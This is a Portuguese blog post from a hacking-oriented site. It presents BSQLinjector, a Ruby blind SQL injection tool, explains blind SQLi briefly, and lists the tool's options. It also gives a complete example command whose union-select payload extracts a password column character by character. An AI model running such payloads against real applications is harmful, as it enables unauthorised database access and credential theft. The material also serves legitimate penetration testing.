BSQLinjector - Blind SQL Injection Tool Download em Ruby - Anonymous Hacker

[Latest News][10]

Análise de Vulnerabilidade
ANDROID
ANONYMOUS
ANTI-DDOS
ANTI-SPYWARES E ADWARES
APK PRO
APOSTILAS
CIÊNCIA
CURSO PHP
CURSO TCP / IP
CURSOS
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
DICAS
DOCUMENTARIO
DoS
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
INVASÕES
IPHONE
JOGOS
KALI LINUX
Lixão
MAC OS
Malware
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

BSQLinjector - Blind SQL Injection Tool Download em Ruby

BSQLinjector é uma ferramenta fácil de usar Blind SQL Injection no Ruby, que usa métodos cegos para recuperar dados de bancos de dados SQL. O download está abaixo.
O autor recomenda usar a opção " --test" para ver claramente como a carga útil configurada se parece antes de enviá-la para um aplicativo.

O que é Blind SQL Injection?

O Blind SQL Injection é um tipo de ataque SQL Injection (SQLi) que questiona as perguntas verdadeiras ou falsas do banco de dados e determina a resposta com base na resposta do aplicativo. Esse ataque geralmente é usado quando o aplicativo da Web está configurado para mostrar mensagens genéricas de erro, mas não atenuou o código que é vulnerável à injeção SQL.

Usando BSQLinjector para Blind SQL Injection


 --file     Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.tx
  --pattern     Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
  --prepend     Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append     How to end our payload. For example comment out rest of SQL statement. (--append='#)
  --schar     Character placed around chars. This character is not used while in hex mode. (--schar="'")
  --2ndfile     File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
  --mode     Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l
(complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
  --hex     Use hex to compare instead of characters.
  --case     Case sensitivity.
  --ssl     Use SSL.
  --proxy     Proxy to use. (--proxy=127.0.0.1:8080)
  --test     Enable test mode. Do not send request, just show full payload.
  --special     Include all special characters in enumeration.
  --start     Start enumeration from specified character. (--start=10)
  --max     Maximum characters to enumerate. (--max=10)
  --timeout     Timeout in waiting for responses. (--timeout=20)
  --only-final Stop showing each enumerated letter.
  --comma     Encode comma.
  --bracket     Add brackets to the end of substring function. --bracket="))"
  --hexspace Use space instead of brackets to split hex values.
  --verbose     Show verbose messages.


Exemplo de uso:  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

A ferramenta de injeção Blind SQL mais famosa seria definitivamente o sqlmap, que o automatiza .
Você pode baixar BSQLinjector aqui: Senha: 123456

Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search